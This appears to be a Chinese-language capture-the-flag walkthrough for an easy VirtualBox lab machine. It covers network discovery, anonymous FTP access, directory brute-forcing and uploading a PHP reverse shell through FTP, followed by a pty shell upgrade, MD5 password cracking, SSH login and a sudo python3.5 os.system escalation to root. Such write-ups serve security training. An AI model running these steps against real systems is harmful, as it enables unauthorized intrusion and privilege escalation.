靶场难度:easy
适用场景:Virtualbox
网络模式:桥接模式
一:信息探测
1.主机发现
换种主机发现的方法。
netdiscover -r 192.168.1.1/24
2,开放服务及端口。分别访问一下。
2,ftp服务-anonymous登录。
3,看一下目录,准备好接听电话!
gobuster dir -u http://192.168.1.26:80 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 200
发现和 ftp 中的一样,应该是 ftp 服务器提供的,可以尝试一下在 FTP 服务器中放置一个 webshell,然后用 Web 浏览器执行它。
二:漏洞利用
1:利用ftp上传shell,
拷贝 kali 中的 php-reverse-shell.php
当前目录,修改为反弹shell监听的IP。
2:上传成功
put php-reverse-shell.php
3:反弹成功
4:提权
1;切换到shell,可以优化一下的意思。
python3 -c 'import pty;pty.spawn("/bin/bash")'
1;首先,查看密码本,发现shrek这个用户,或者直接进到home,运行一下。
2:shrek 用户的密码,md5解密。
3:连接到ssh。
三:提权
这个用户只能用sudo
使用python3.5
这条命令 使用python os
库调用系统命令
sudo python3.5 -c 'import os;os.system("/bin/bash")'
ssh提权成功,两个flag。
2:监听提权成功,两个flag。